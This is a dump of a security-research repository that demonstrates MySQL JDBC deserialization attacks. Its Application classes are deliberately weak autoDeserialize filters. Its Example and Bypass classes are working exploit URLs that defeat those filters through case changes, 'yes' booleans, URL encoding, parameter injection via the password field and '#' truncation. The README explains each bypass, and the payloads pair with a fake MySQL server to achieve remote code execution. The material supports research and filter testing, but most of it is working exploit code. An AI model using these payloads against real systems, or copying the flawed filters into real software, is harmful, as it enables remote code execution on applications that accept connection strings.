Repository: Y4Sec-Team/mysql-jdbc-tricks
Branch: master
Commit: dfc4f920ef75
Files: 26
Total size: 21.4 KB
Directory structure:
gitextract_z5ohkhvb/
├── .gitignore
├── README.md
├── pom.xml
└── src/
└── main/
└── java/
└── org/
└── y4sec/
└── team/
├── app/
│ ├── Application1.java
│ ├── Application10.java
│ ├── Application2.java
│ ├── Application3.java
│ ├── Application4.java
│ ├── Application5.java
│ ├── Application6.java
│ ├── Application7.java
│ ├── Application8.java
│ └── Application9.java
└── exploit/
├── Example1.java
├── Example10.java
├── Example2.java
├── Example3.java
├── Example4.java
├── Example5.java
├── Example6.java
├── Example7.java
├── Example7Bypass.java
├── Example8.java
├── Example8Bypass.java
├── Example9.java
└── Example9Bypass.java
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
target/
!.mvn/wrapper/maven-wrapper.jar
!**/src/main/**/target/
!**/src/test/**/target/
### IntelliJ IDEA ###
.idea/modules.xml
.idea/jarRepositories.xml
.idea/compiler.xml
.idea/libraries/
*.iws
*.iml
*.ipr
### Eclipse ###
.apt_generated
.classpath
.factorypath
.project
.settings
.springBeans
.sts4-cache
### NetBeans ###
/nbproject/private/
/nbbuild/
/dist/
/nbdist/
/.nb-gradle/
build/
!**/src/main/**/build/
!**/src/test/**/build/
### VS Code ###
.vscode/
### Mac OS ###
.DS_Store
.idea/
================================================
FILE: README.md
================================================
## mysql-jdbc-tricks
这里是很多`MySQL JDBC Attack`的小技巧,我仅在`MySQL`的`JDBC`驱动中测试,这里的技巧可能在其他类型的数据库驱动中也存在
文章:https://mp.weixin.qq.com/s/lmoWKK41ZQzZOh-P26VUng
推荐搭建:推荐配合 https://github.com/4ra1n/mysql-fake-server 使用
### 基本示例
参考`Application1`和`Example1`代码
这是一个不存在任何过滤的情况,直接执行即可`RCE`
### 大小写绕过
参考`Application1`和`Example1`代码
这里展示了一种简单的防护和绕过,`MySQL`驱动对于连接参数的大小不做限制,如果开发者不做大小写限制,将会被轻易饶过
### YES绕过
参考`Application3`和`Example3`代码
这里展示了一种简单的防护和绕过,`MySQL`驱动允许的`Bool`值是包含`true/yes`两种的,因此存在一种绕过
### 编码绕过
参考`Application4`和`Example4`代码
这里展示了某些情况下的绕过,`MySQL`驱动允许`URL`编码,因此如果开发者没有按照标准`URL`解析和过滤,将会存在绕过
### 暂时的安全
参考`Application5`和`Example5`代码
对于这种情况,似乎是安全了,或许有其他的绕过?
### 另一种形式的传参
参考`Application6`和`Example6`代码
这也是`JDBC`攻击很常见的一种情况
### 额外参数检查绕过
参考`Application7`和`Example7Bypass`代码
限制额外连接参数情况下如何绕过
### 特殊情况下的#号绕过
参考`Application8`和`Example8Bypass`代码
一种特殊情况的绕过,属于一种逻辑漏洞
### 另一种特殊场景的绕过
参考`Application9`和`Example9Bypass`代码
另一种特殊情况的绕过,开发者忽略某些参数过滤导致的绕过
### 可能安全
参考`Application10`和`Example10`代码
对于这种情况,似乎是安全了,或许有其他的绕过?
================================================
FILE: pom.xml
================================================
4.0.0
org.y4sec
mysql-jdbc-tricks
1.0
8
8
UTF-8
mysql
mysql-connector-java
6.0.2
commons-beanutils
commons-beanutils
1.9.4
================================================
FILE: src/main/java/org/y4sec/team/app/Application1.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
public class Application1 {
public static void connection(String url){
try {
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application10.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
public class Application10 {
public static void connection(String addr, String user, String db, String password, String extra) {
try {
String url = String.format("jdbc:mysql://%s/%s?", addr, db);
StringBuilder sb = new StringBuilder();
sb.append("user=");
sb.append(check(user));
sb.append("&");
sb.append("password=");
sb.append(check(password));
if (!extra.equals("")) {
sb.append("&");
sb.append(check(extra));
}
url = url + sb;
check(url);
System.out.println(url);
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static String check(String params) {
if (params.contains("autoDeserialize")) {
throw new RuntimeException("you are hacker");
}
return params;
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application2.java
================================================
package org.y4sec.team.app;
import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
public class Application2 {
public static void connection(String url){
try {
if(!check(url)) {
System.out.println("you are hacker");
return;
}
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static boolean check(String jdbcUrl){
try {
Map params = new HashMap<>();
String query = jdbcUrl.split("\\?")[1];
if (query != null) {
String[] pairs = query.split("&");
for (String pair : pairs) {
String[] keyValue = pair.split("=");
String key = keyValue[0];
String value = keyValue.length > 1 ? keyValue[1] : "";
params.put(key, value);
}
}
System.out.println("Params: " + params);
for (Map.Entry p: params.entrySet()){
if (p.getKey().equals("autoDeserialize")) {
if(p.getValue().equals("true")){
return false;
}
}
}
return true;
} catch (Exception e) {
e.printStackTrace();
return false;
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application3.java
================================================
package org.y4sec.team.app;
import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
public class Application3 {
public static void connection(String url){
try {
if(!check(url)) {
System.out.println("you are hacker");
return;
}
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static boolean check(String jdbcUrl){
try {
Map params = new HashMap<>();
String query = jdbcUrl.split("\\?")[1];
if (query != null) {
String[] pairs = query.split("&");
for (String pair : pairs) {
String[] keyValue = pair.split("=");
String key = keyValue[0];
String value = keyValue.length > 1 ? keyValue[1] : "";
params.put(key, value);
}
}
System.out.println("Params: " + params);
for (Map.Entry p: params.entrySet()){
if (p.getKey().equals("autoDeserialize")) {
String value = p.getValue();
value = value.toLowerCase();
if(value.equals("true")){
return false;
}
}
}
return true;
} catch (Exception e) {
e.printStackTrace();
return false;
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application4.java
================================================
package org.y4sec.team.app;
import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
public class Application4 {
public static void connection(String url) {
try {
if (!check(url)) {
System.out.println("you are hacker");
return;
}
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static boolean check(String jdbcUrl) {
try {
Map params = new HashMap<>();
String query = jdbcUrl.split("\\?")[1];
if (query != null) {
String[] pairs = query.split("&");
for (String pair : pairs) {
String[] keyValue = pair.split("=");
String key = keyValue[0];
String value = keyValue.length > 1 ? keyValue[1] : "";
params.put(key, value);
}
}
System.out.println("Params: " + params);
for (Map.Entry p : params.entrySet()) {
if (p.getKey().equals("autoDeserialize")) {
String value = p.getValue();
value = value.toLowerCase();
if (value.equals("true") || value.equals("yes")) {
return false;
}
}
}
return true;
} catch (Exception e) {
e.printStackTrace();
return false;
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application5.java
================================================
package org.y4sec.team.app;
import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
public class Application5 {
public static void connection(String url) {
try {
if (!check(url)) {
System.out.println("you are hacker");
return;
}
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static boolean check(String jdbcUrl) {
try {
URI uri = new URI(jdbcUrl.replace("jdbc:", ""));
String host = uri.getHost();
int port = uri.getPort();
String path = uri.getPath();
String dbname = path.substring(1);
Map params = new HashMap<>();
String query = uri.getQuery();
if (query != null) {
String[] pairs = query.split("&");
for (String pair : pairs) {
String[] keyValue = pair.split("=");
String key = keyValue[0];
String value = keyValue.length > 1 ? keyValue[1] : "";
params.put(key, value);
}
}
System.out.println("Host: " + host);
System.out.println("Port: " + port);
System.out.println("DB Name: " + dbname);
System.out.println("Params: " + params);
for (Map.Entry p : params.entrySet()) {
if (p.getKey().equals("autoDeserialize")) {
String value = p.getValue();
value = value.toLowerCase();
if (value.equals("true") || value.equals("yes")) {
return false;
}
}
}
return true;
} catch (Exception e) {
e.printStackTrace();
return false;
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application6.java
================================================
package org.y4sec.team.app;
import java.net.URLDecoder;
import java.sql.DriverManager;
public class Application6 {
public static void connection(String addr,String user,String db,String password,String extra) {
try {
String url = String.format("jdbc:mysql://%s/%s?",addr,db);
StringBuilder sb = new StringBuilder();
sb.append("user=");
sb.append(user);
sb.append("&");
sb.append("password=");
sb.append(password);
if (!extra.equals("")){
sb.append("&");
sb.append(extra);
}
url = url + sb;
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application7.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
public class Application7 {
public static void connection(String addr,String user,String db,String password,String extra) {
try {
String url = String.format("jdbc:mysql://%s/%s?",addr,db);
StringBuilder sb = new StringBuilder();
sb.append("user=");
sb.append(user);
sb.append("&");
sb.append("password=");
sb.append(password);
if (!check(extra)){
System.out.println("you are hacker");
return;
}
if (!extra.equals("")){
sb.append("&");
sb.append(extra);
}
url = url + sb;
System.out.println(url);
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static boolean check(String params){
try {
return !params.contains("autoDeserialize");
} catch (Exception e) {
e.printStackTrace();
return false;
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application8.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
public class Application8 {
public static void connection(String addr, String user, String db, String password, String extra) {
try {
String url = String.format("jdbc:mysql://%s/%s?", addr, db);
StringBuilder sb = new StringBuilder();
sb.append("user=");
sb.append(user);
sb.append("&");
sb.append("password=");
sb.append(password);
if (!check(extra)) {
System.out.println("you are hacker");
return;
}
if (!extra.equals("")) {
sb.append("&");
sb.append(extra);
}
if (url.endsWith("?")) {
url = url + sb + "autoDeserialize=false";
} else {
url = url + sb + "&autoDeserialize=false";
}
System.out.println(url);
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static boolean check(String params) {
try {
return !params.contains("autoDeserialize");
} catch (Exception e) {
e.printStackTrace();
return false;
}
}
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application9.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
public class Application9 {
public static void connection(String addr, String user, String db, String password, String extra) {
try {
String url = String.format("jdbc:mysql://%s/%s?", addr, db);
StringBuilder sb = new StringBuilder();
sb.append("user=");
sb.append(check(user));
sb.append("&");
sb.append("password=");
sb.append(check(password));
if (!extra.equals("")) {
sb.append("&");
sb.append(check(extra));
}
url = url + sb;
System.out.println(url);
Class.forName("com.mysql.cj.jdbc.Driver");
DriverManager.getConnection(url);
} catch (Exception e) {
e.printStackTrace();
}
}
private static String check(String params) {
if (params.contains("autoDeserialize")) {
throw new RuntimeException("you are hacker");
}
return params;
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example1.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application1;
public class Example1 {
public static void main(String[] args) {
String addr = "127.0.0.1:62787";
String params = "detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe";
String url = String.format( "jdbc:mysql://%s/test?%s",addr,params);
Application1.connection(url);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example10.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application10;
public class Example10 {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#";
String user = "deser_CB_calc.exe";
String password = "test";
String db = "test";
String extra = "";
Application10.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example2.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application2;
public class Example2 {
public static void main(String[] args) {
String addr = "127.0.0.1:62787";
String params = "detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe";
String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application2.connection(url);
addr = "127.0.0.1:62787";
params = "detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe";
url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application2.connection(url);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example3.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application3;
public class Example3 {
public static void main(String[] args) {
String addr = "127.0.0.1:62787";
String params = "detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe";
String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application3.connection(url);
addr = "127.0.0.1:62787";
params = "detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe";
url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application3.connection(url);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example4.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application4;
public class Example4 {
public static void main(String[] args) {
String addr = "127.0.0.1:62787";
String params = "detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe";
String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application4.connection(url);
addr = "127.0.0.1:62787";
params = "detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe";
url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application4.connection(url);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example5.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application5;
public class Example5 {
public static void main(String[] args) {
String addr = "127.0.0.1:62787";
String params = "detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe";
String url = String.format("jdbc:mysql://%s/test?%s", addr, params);
Application5.connection(url);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example6.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application6;
public class Example6 {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787";
String user = "deser_CB_calc.exe";
String password = "test";
String db = "test";
String extra = "detectCustomCollations=true&autoDeserialize=true";
Application6.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example7.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application7;
public class Example7 {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787";
String user = "deser_CB_calc.exe";
String password = "test";
String db = "test";
String extra = "detectCustomCollations=true&autoDeserialize=true";
Application7.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example7Bypass.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application7;
public class Example7Bypass {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787";
String user = "deser_CB_calc.exe";
String password = "test&autoDeserialize=true&";
String db = "test";
String extra = "detectCustomCollations=true&";
Application7.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example8.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application8;
public class Example8 {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787";
String user = "deser_CB_calc.exe";
String password = "test&autoDeserialize=true&";
String db = "test";
String extra = "detectCustomCollations=true&";
Application8.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example8Bypass.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application8;
public class Example8Bypass {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787";
String user = "deser_CB_calc.exe";
String password = "test&autoDeserialize=true";
String db = "test";
String extra = "detectCustomCollations=true&#?";
Application8.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example9.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application9;
public class Example9 {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787";
String user = "deser_CB_calc.exe";
String password = "test&autoDeserialize=true&";
String db = "test";
String extra = "detectCustomCollations=true&";
Application9.connection(addr,user,db,password,extra);
}
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example9Bypass.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application9;
public class Example9Bypass {
public static void main(String[] args) {
// 可控内容
String addr = "127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#";
String user = "deser_CB_calc.exe";
String password = "test";
String db = "test";
String extra = "";
Application9.connection(addr,user,db,password,extra);
}
}